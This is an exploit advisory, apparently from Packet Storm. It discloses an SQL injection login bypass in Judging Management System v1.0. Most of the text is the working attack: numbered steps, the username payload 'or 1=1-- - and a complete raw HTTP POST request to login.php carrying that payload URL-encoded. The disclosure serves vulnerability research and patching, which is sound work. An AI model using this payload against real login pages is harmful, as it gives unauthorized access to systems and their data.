Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.
c36671f4c18dabebfb4ac38ad51b98f6b1c989d4f3b2c717cdb996cef42f7aaf# Exploit Title: Judging Management System v1.0 - Authentication Bypass
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
# Vulnerability: An attacker can bypass login page and access to dashboard page
# Vulnerable file: login.php
# Exploit:
1) Go to: http://localhost/php-jms/index.php
2) As username use this payload: 'or 1=1-- -
3) Use random words for password
POST /php-jms/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/php-jms/index.php
Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=%27or+1%3D1--+-&password=asa
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed